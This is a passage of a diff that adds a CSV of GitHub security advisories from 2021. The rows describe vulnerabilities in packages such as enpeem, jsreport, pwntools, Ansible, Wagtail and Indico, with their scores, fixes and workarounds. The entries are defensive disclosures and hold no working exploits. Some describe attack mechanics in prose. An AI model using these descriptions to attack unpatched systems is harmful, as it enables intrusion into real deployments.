diff --git "a/github-advisory-2021.csv" "b/github-advisory-2021.csv" new file mode 100644--- /dev/null +++ "b/github-advisory-2021.csv" @@ -0,0 +1,25951 @@ +schema_version,id,modified,published,withdrawn,aliases,summary,details,severity,affected,references,database_specific +1.4.0,GHSA-76f4-fw33-6j2v,2021-10-08T21:23:41Z,2021-04-19T14:48:26Z,,[],Potential sensitive data exposure in applications using Vaadin 15,"Insecure configuration of default `ObjectMapper` in `com.vaadin:flow-server` versions 3.0.0 through 3.0.5 (Vaadin 15.0.0 through 15.0.4) may expose sensitive data if the application also uses e.g. `@RestController` + +- https://vaadin.com/security/cve-2020-36319","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:vaadin-bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '15.0.0'}, {'fixed': '15.0.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/platform/security/advisories/GHSA-76f4-fw33-6j2v'}, {'type': 'PACKAGE', 'url': 'https://github.com/vaadin/platform'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2020-36319'}]","{'cwe_ids': ['CWE-200'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T23:14:31Z', 'nvd_published_at': None}" +1.4.0,GHSA-w3hj-wr2q-x83g,2021-03-30T17:04:34Z,2021-04-06T17:22:17Z,,[],Discovery uses the same AES/GCM Nonce throughout the session,"Discovery uses the same AES/GCM Nonce throughout the session though it should be generated on per message basis which can lead to the leaking of the session key. As the actual ENR record is signed with a different key it is not possible for an attacker to alter the ENR record. Note that the node private key is not compromised, only the session key generated to communicate with an individual peer. + +From [discovery spec](https://github.com/ethereum/devp2p/blob/f97b8a5b8e9589d3355ebbd9d4a58d5d1644bdf7/discv5/discv5-theory.md#session-cache): +> The number of messages which can be encrypted with a certain session key is limited because encryption of each message requires a unique nonce for AES-GCM. In addition to the keys, the session cache must also keep track of the count of outgoing messages to ensure the uniqueness of nonce values. Since the wire protocol uses 96 bit AES-GCM nonces, it is strongly recommended to generate them by encoding the current outgoing message count into the first 32 bits of the nonce and filling the remaining 64 bits with random data generated by a cryptographically secure random number generator.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'tech.pegasys.discovery:discovery'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.4.5'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ConsenSys/discovery/security/advisories/GHSA-w3hj-wr2q-x83g'}]","{'cwe_ids': ['CWE-323'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T17:04:34Z', 'nvd_published_at': None}" +1.4.0,GHSA-hmw2-mvvh-jf5j,2021-04-08T22:25:20Z,2021-04-13T15:22:47Z,,['CVE-2019-10801'],OS Command Injection in enpeem,enpeem through 2.2.0 allows execution of arbitrary commands. The "options.dir" argument is provided to the "exec" function without any sanitization.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'enpeem'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.2.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-10801'}, {'type': 'WEB', 'url': 'https://github.com/balderdashy/enpeem/blob/master/index.js#L114'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-ENPEEM-559007'}]","{'cwe_ids': ['CWE-78'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-08T22:25:20Z', 'nvd_published_at': '2020-02-28T21:15:00Z'}" +1.4.0,GHSA-5fjj-cfh2-ghc5,2021-04-06T22:34:40Z,2021-04-13T15:25:24Z,,['CVE-2020-8128'],Server-Side Request Forgery and Inclusion of Functionality from Untrusted Control Sphere in jsreport,An unintended require and server-side request forgery vulnerabilities in jsreport version 2.5.0 and earlier allow attackers to execute arbitrary code.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'jsreport'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.6.0'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.5.0'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8128'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/660565'}]","{'cwe_ids': ['CWE-829', 'CWE-918'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T22:34:40Z', 'nvd_published_at': '2020-02-14T22:15:00Z'}" +1.4.0,GHSA-7xc5-ggpp-g249,2023-08-07T11:51:29Z,2021-04-20T16:13:24Z,,['CVE-2020-28468'],pwntools Server-Side Template Injection (SSTI) vulnerability,"This affects the package pwntools before 4.3.1. The shellcraft generator for affected versions of this module are vulnerable to Server-Side Template Injection (SSTI), which can lead to remote code execution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'pwntools'}, 'ecosystem_specific': {'affected_functions': ['pwnlib.shellcraft.pretty', 'pwnlib.constants.ConstantsModule.eval']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.3.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28468'}, {'type': 'WEB', 'url': 'https://github.com/Gallopsled/pwntools/issues/1427'}, {'type': 'WEB', 'url': 'https://github.com/Gallopsled/pwntools/pull/1732'}, {'type': 'WEB', 'url': 'https://github.com/Gallopsled/pwntools/commit/138188eb1c027a2d0ffa4151511c407d3a001660'}, {'type': 'PACKAGE', 'url': 'https://github.com/Gallopsled/pwntools'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-PYTHON-PWNTOOLS-1047345'}]","{'cwe_ids': ['CWE-74'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-06T23:11:00Z', 'nvd_published_at': '2021-01-08T12:15:00Z'}" +1.4.0,GHSA-3c67-gc48-983w,2023-08-31T20:35:31Z,2021-04-20T16:44:37Z,,['CVE-2020-10691'],Path Traversal in Ansible,"An archive traversal flaw was found in all ansible-engine versions 2.9.x prior to 2.9.7, when running `ansible-galaxy collection` install. When extracting a collection .tar.gz file, the directory is created without sanitizing the filename. An attacker could take advantage to overwrite any file within the system.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:N/I:L/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'ansible'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.9.0'}, {'fixed': '2.9.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10691'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/pull/68596'}, {'type': 'WEB', 'url': 'https://github.com/ansible/ansible/commit/b2551bb6943eec078066aa3a923e0bb3ed85abe8'}, {'type': 'WEB', 'url': 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2020-10691'}]","{'cwe_ids': ['CWE-22'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-05T14:22:26Z', 'nvd_published_at': '2020-04-30T17:15:00Z'}" +1.4.0,GHSA-mmhj-4w6j-76h7,2021-03-30T22:27:45Z,2021-04-06T17:22:55Z,,['CVE-2021-21413'],Misuse of `Reference` and other transferable APIs may lead to access to nodejs isolate,"Versions of `isolated-vm` before v4.0.0, and especially before v3.0.0, have API pitfalls which may make it easy for implementers to expose supposed secure isolates to the permissions of the main nodejs isolate. + +`Reference` objects allow access to the underlying reference's full prototype chain. In an environment where the implementer has exposed a `Reference` instance to an attacker they would be able to use it to acquire a `Reference` to the nodejs context's `Function` object. + +Similar application-specific attacks could be possible by modifying the local prototype of other API objects. + +Access to `NativeModule` objects could allow an attacker to load and run native code from anywhere on the filesystem. If combined with, for example, a file upload API this would allow for arbitrary code execution. + +To address these issues the following changes were made in v4.0.0: +- Documentation was updated with more explicit guidelines on building secure applications. +- `Reference` instances will no longer follow prototype chains by default, nor will they invoke accessors or proxies. +- All `isolated-vm` API prototypes are now immutable. +- `NativeModule` constructor may only be invoked from a nodejs isolate.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:A/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'isolated-vm'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '4.0.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/security/advisories/GHSA-mmhj-4w6j-76h7'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21413'}, {'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/commit/2646e6c1558bac66285daeab54c7d490ed332b15'}, {'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/commit/27151bfecc260e96714443613880e3b2e6596704'}, {'type': 'WEB', 'url': 'https://github.com/laverdet/isolated-vm/blob/main/CHANGELOG.md#v400'}]","{'cwe_ids': ['CWE-913'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-30T22:27:45Z', 'nvd_published_at': '2021-03-30T23:15:00Z'}" +1.4.0,GHSA-2xpj-f5g2-8p7m,2023-08-30T21:16:22Z,2021-04-20T16:30:51Z,,['CVE-2020-17446'],Asyncpg Arbitrary Code Execution Via Access to an Uninitialized Pointer,"asyncpg before 0.21.0 allows a malicious PostgreSQL server to trigger a crash or execute arbitrary code (on a database client) via a crafted server response, because of access to an uninitialized pointer in the array data decoder.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'asyncpg'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '0.21.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-17446'}, {'type': 'WEB', 'url': 'https://github.com/MagicStack/asyncpg/commit/69bcdf5bf7696b98ee708be5408fd7d854e910d0'}, {'type': 'WEB', 'url': 'https://github.com/MagicStack/asyncpg/releases/tag/v0.21.0'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/09/msg00002.html'}]","{'cwe_ids': ['CWE-824'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-14T21:35:20Z', 'nvd_published_at': '2020-08-12T16:15:00Z'}" +1.4.0,GHSA-rvcw-f68w-8h8h,2023-03-17T17:49:57Z,2021-04-19T15:00:05Z,,['CVE-2021-29446'],Padding Oracle Attack due to Observable Timing Discrepancy in jose-node-cjs-runtime,"### Impact + +[AES_CBC_HMAC_SHA2 Algorithm](https://tools.ietf.org/html/rfc7518#section-5.2) (A128CBC-HS256, A192CBC-HS384, A256CBC-HS512) decryption would always execute both HMAC tag verification and CBC decryption, if either failed `JWEDecryptionFailed` would be thrown. But a possibly observable difference in timing when padding error would occur while decrypting the ciphertext makes a padding oracle and an adversary might be able to make use of that oracle to decrypt data without knowing the decryption key by issuing on average 128*b calls to the padding oracle (where b is the number of bytes in the ciphertext block). + +### Patches + +A patch was released which ensures the HMAC tag is verified before performing CBC decryption. The fixed versions are `>=3.11.4`. + +Users should upgrade to `^3.11.4`. + +### Credits +Thanks to Morgan Brown of Microsoft for bringing this up and Eva Sarafianou (@esarafianou) for helping to score this advisory.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'jose-node-cjs-runtime'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.11.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/panva/jose/security/advisories/GHSA-rvcw-f68w-8h8h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29446'}, {'type': 'PACKAGE', 'url': 'https://github.com/panva/jose'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/jose-node-cjs-runtime'}]","{'cwe_ids': ['CWE-203', 'CWE-208', 'CWE-696'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T22:57:33Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}" +1.4.0,GHSA-3pcr-4982-548m,2021-04-12T22:33:05Z,2021-04-13T15:13:37Z,,[],Exposure of .env if project root is configured as web root in shopware/production,"### Impact + +The .env and other sensitive files can be leaked if the project root and not `/public` is configured as the web root. + +### Patches +We recommend to update to the current version 6.3.5.3. You can get the update to 6.3.5.3 regularly via the Auto-Updater or directly via the download overview. + +https://www.shopware.com/en/download/#shopware-6 + +### Workarounds + +You should always use `/public` as the web root. + +For older versions of 6.1 and 6.2, corresponding security measures are also available via a plugin. For the full range of functions, we recommend updating to the latest Shopware version. + +https://store.shopware.com/en/detail/index/sArticle/518463/number/Swag136939272659 + +### For more information +https://docs.shopware.com/en/shopware-6-en/security-updates/security-update-04-2021",[],"[{'package': {'ecosystem': 'Packagist', 'name': 'shopware/production'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '6.3.5.3'}]}], 'database_specific': {'last_known_affected_version_range': '<= 6.3.5.2'}}]","[{'type': 'WEB', 'url': 'https://github.com/shopware/platform/security/advisories/GHSA-3pcr-4982-548m'}]","{'cwe_ids': ['CWE-552'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-12T22:33:05Z', 'nvd_published_at': None}" +1.4.0,GHSA-67mq-h2r9-rh2m,2022-12-03T03:51:28Z,2021-04-13T15:23:41Z,,['CVE-2020-28460'],Prototype pollution in multi-ini,This affects the package multi-ini before 2.1.2. It is possible to pollute an object's prototype by specifying the constructor.proto object as part of an array. This is a bypass of CVE-2020-28448.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'multi-ini'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28460'}, {'type': 'WEB', 'url': 'https://github.com/evangelion1204/multi-ini/commit/6b2212b2ce152c19538a2431415f72942c5a1bde'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-MULTIINI-1053229'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-07T23:23:09Z', 'nvd_published_at': '2020-12-22T13:15:00Z'}" +1.4.0,GHSA-6g3c-2mh5-7q6x,2023-09-25T16:03:47Z,2021-04-19T14:56:33Z,,['CVE-2021-29451'],Missing validation of JWT signature in `ManyDesigns/Portofino`,"### Impact +[Portofino](https://github.com/ManyDesigns/Portofino) is an open source web development framework. Portofino before version 5.2.1 did not properly verify the signature of JSON Web Tokens. +This allows forging a valid JWT. + +### Patches +The issue will be patched in the upcoming 5.2.1 release. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [https://github.com/ManyDesigns/Portofino](https://github.com/ManyDesigns/Portofino)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.manydesigns:portofino-dispatcher'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.1'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.manydesigns:portofino-core'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '5.0.0'}, {'fixed': '5.2.1'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ManyDesigns/Portofino/security/advisories/GHSA-6g3c-2mh5-7q6x'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29451'}, {'type': 'WEB', 'url': 'https://github.com/ManyDesigns/Portofino/commit/8c754a0ad234555e813dcbf9e57d637f9f23d8fb'}, {'type': 'WEB', 'url': 'https://mvnrepository.com/artifact/com.manydesigns/portofino'}]","{'cwe_ids': ['CWE-347'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-16T22:57:13Z', 'nvd_published_at': '2021-04-16T22:15:00Z'}" +1.4.0,GHSA-vp77-fqqp-79j8,2021-03-22T22:39:06Z,2021-04-13T15:20:27Z,,['CVE-2020-28449'],Prototype Pollution in decal,This affects all versions of package decal. The vulnerability is in the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'decal'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '2.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28449'}, {'type': 'WEB', 'url': 'https://github.com/gigafied/decal.js/blob/master/src/utils/set.js%23L45-L73'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-DECAL-1051007'}, {'type': 'WEB', 'url': 'https://www.npmjs.com/package/decal'}]","{'cwe_ids': ['CWE-1321', 'CWE-400'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-22T22:39:06Z', 'nvd_published_at': '2021-02-04T15:15:00Z'}" +1.4.0,GHSA-wq5h-f9p5-q7fx,2023-04-21T15:24:43Z,2021-04-20T14:02:30Z,,['CVE-2021-29434'],Improper validation of URLs ('Cross-site Scripting') in Wagtail rich text fields,"### Impact +When saving the contents of a rich text field in the admin interface, Wagtail does not apply server-side checks to ensure that link URLs use a valid protocol. A malicious user with access to the admin interface could thus craft a POST request to publish content with `javascript:` URLs containing arbitrary code. The vulnerability is not exploitable by an ordinary site visitor without access to the Wagtail admin. + +### Patches +Patched versions have been released as Wagtail 2.11.7 (for the LTS 2.11 branch) and Wagtail 2.12.4 (for the current 2.12 branch). + +### Workarounds +For sites that cannot easily upgrade to a current supported version, the vulnerability can be patched by adding the following code to a `wagtail_hooks.py` module in any installed app: + +```python +from draftjs_exporter.dom import DOM +from wagtail.admin.rich_text.converters.html_to_contentstate import ExternalLinkElementHandler, PageLinkElementHandler +from wagtail.core import hooks +from wagtail.core.whitelist import check_url + + +def link_entity(props): + id_ = props.get('id') + link_props = {} + + if id_ is not None: + link_props['linktype'] = 'page' + link_props['id'] = id_ + else: + link_props['href'] = check_url(props.get('url')) + + return DOM.create_element('a', link_props, props['children']) + + +@hooks.register('register_rich_text_features', order=1) +def register_link(features): + features.register_converter_rule('contentstate', 'link', { + 'from_database_format': { + 'a[href]': ExternalLinkElementHandler('LINK'), + 'a[linktype=""page""]': PageLinkElementHandler('LINK'), + }, + 'to_database_format': { + 'entity_decorators': {'LINK': link_entity} + } + }) +``` + +### Acknowledgements +Many thanks to Kevin Breen for reporting this issue. + +### For more information +If you have any questions or comments about this advisory: + +* Visit Wagtail's [support channels](https://docs.wagtail.io/en/stable/support.html) +* Email us at security@wagtail.io (if you wish to send encrypted email, the public key ID is `0x6ba1e1a86e0f8ce8`)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ecosystem_specific': {'affected_functions': ['wagtail.admin.rich_text.converters.contentstate.link_entity']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.11.7'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.11.6'}}, {'package': {'ecosystem': 'PyPI', 'name': 'wagtail'}, 'ecosystem_specific': {'affected_functions': ['wagtail.admin.rich_text.converters.contentstate.link_entity']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.12'}, {'fixed': '2.12.4'}]}], 'database_specific': {'last_known_affected_version_range': '<= 2.12.3'}}]","[{'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/security/advisories/GHSA-wq5h-f9p5-q7fx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29434'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/commit/5c7a60977cba478f6a35390ba98cffc2bd41c8a4'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/commit/915f6ed2bd7d53154103cc4424a0f18695cdad6c'}, {'type': 'PACKAGE', 'url': 'https://github.com/wagtail/wagtail'}, {'type': 'WEB', 'url': 'https://github.com/wagtail/wagtail/compare/v2.11.6...v2.11.7'}, {'type': 'WEB', 'url': 'https://pypi.org/project/wagtail/'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-04-19T18:46:26Z', 'nvd_published_at': '2021-04-19T19:15:00Z'}" +1.4.0,GHSA-jh5x-hfhg-78jq,2023-07-05T23:21:42Z,2021-04-22T16:20:50Z,,['CVE-2020-28948'],Deserialization of Untrusted Data in Archive_Tar,Archive_Tar through 1.4.10 allows an unserialization attack because `phar:` is blocked but `PHAR:` is not blocked. See: https://github.com/pear/Archive_Tar/issues/33,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'pear/archive_tar'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.4.11'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28948'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/issues/33'}, {'type': 'WEB', 'url': 'https://github.com/pear/Archive_Tar/commit/0670a05fdab997036a3fc3ef113b8f5922e574da'}, {'type': 'PACKAGE', 'url': 'https://github.com/pear/Archive_Tar'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2020/11/msg00045.html'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/42GPGVVFTLJYAKRI75IVB5R45NYQGEUR/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/4V35LBRM6HBCXBVCITKQ4UEBTXO2EG7B/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/5KSFM672XW3X6BR7TVKRD63SLZGKK437/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/KWM4CTMEGAC4I2CHYNJVSROY4CVXVEUT/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NBYZSHYTIOBK6V7C4N7TP6KIKCRKLVWP/'}, {'type': 'WEB', 'url': 'https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VJQQYDAOWHD6RDITDRPHFW7WY6BS3V5N/'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/202101-23'}, {'type': 'WEB', 'url': 'https://www.debian.org/security/2020/dsa-4817'}, {'type': 'WEB', 'url': 'https://www.drupal.org/sa-core-2020-013'}]","{'cwe_ids': ['CWE-502'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-03-23T00:18:26Z', 'nvd_published_at': '2020-11-19T19:15:00Z'}" +1.4.0,GHSA-cwg9-c9cr-p5fq,2021-03-26T23:20:56Z,2021-04-13T15:18:53Z,,['CVE-2021-28161'],Improper Neutralization of Input in Theia console,"In Eclipse Theia versions up to and including 1.8.0, in the debug console there is no HTML escaping, so arbitrary Javascript code can be injected.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': '@theia/console'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.8.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28161'}, {'type': 'WEB', 'url': 'https://github.com/eclipse-theia/theia/issues/8794'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-26T23:20:56Z', 'nvd_published_at': '2021-03-12T22:15:00Z'}" +1.4.0,GHSA-5c66-v29h-xjh8,2021-04-20T18:36:33Z,2021-04-22T16:11:55Z,,['CVE-2021-29459'],XSS Cross Site Scripting,"### Impact +It is possible to persistently inject scripts in XWiki. + +For unregistred users: +- By filling simple text fields + +For registered users: +- By filling their personal information +- (if they have edit rights) By filling the values of static lists using App Within Minutes + +That can lead to user's session hijacking, and if used in conjunction with a social engineering attack it can also lead to disclosure of sensitive data, CSRF attacks and other security vulnerabilities. +That can also lead to the attacker taking over an account. +If the victim has administrative rights it might even lead to code execution on the server, depending on the application and the privileges of the account. +### Patches +It has been patched on XWiki 12.8 and 12.6.3. + +### Workarounds +There is no easy workaround except upgrading XWiki. + +### References +https://jira.xwiki.org/browse/XWIKI-17374 + +### For more information +If you have any questions or comments about this advisory: + * Open an issue in [Jira XWiki](https://jira.xwiki.org) + * Email us at our [security mailing list](mailto:security@xwiki.org)","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-oldcore'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.6.4'}, {'fixed': '12.8'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '12.6.3'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'org.xwiki.platform:xwiki-platform-web'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '12.6.4'}, {'fixed': '12.8'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-5c66-v29h-xjh8'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29459'}]","{'cwe_ids': ['CWE-79'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T18:36:33Z', 'nvd_published_at': '2021-04-20T19:15:00Z'}" +1.4.0,GHSA-wgpj-7c2j-vfjm,2023-09-05T14:29:48Z,2021-04-08T16:33:38Z,,['CVE-2021-30185'],Indico Tampering with links (e.g. password reset) in sent emails,"### Impact +An external audit of the Indico codebase has discovered a vulnerability in Indico's URL generation logic which could have allowed an attacker to make Indico send a password reset link with a valid token pointing to an attacker-controlled domain by sending that domain in the `Host` header. Had a user clicked such a link without realizing it does not point to Indico (and that they never requested it), it would have revealed their password reset token to the attacker, allowing them to reset the password for that user and thus take over their Indico account. + +- If the web server already enforces a canonical host name, this cannot be exploited (this was not part of the default config from the Indico setup guide) +- If only SSO is used ([`LOCAL_IDENTITIES`](https://docs.getindico.io/en/stable/config/settings/#LOCAL_IDENTITIES) set to `False`), the vulnerability cannot be exploited for password reset links, but other links in emails set by Indico could be tampered with in the same way (with less problematic impact though) + +### Patches +You need to update to [Indico 2.3.4](https://github.com/indico/indico/releases/tag/v2.3.4) as soon as possible. +See [the docs](https://docs.getindico.io/en/stable/installation/upgrade/) for instructions on how to update. + +### Workarounds +You can configure the web server to canonicalize the URL to the hostname used for Indico. See [this commit](https://github.com/indico/indico/pull/4815/commits/b6bff6d004abcf07db1891e26a0eb4aa0edb7c21) for the changes in our setup docs; they can be easily applied to your existing web server config. + +### For more information +If you have any questions or comments about this advisory: + +- Open a thread in [our forum](https://talk.getindico.io/) +- Email us privately at indico-team@cern.ch","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'indico'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.4'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/indico/indico/security/advisories/GHSA-wgpj-7c2j-vfjm'}, {'type': 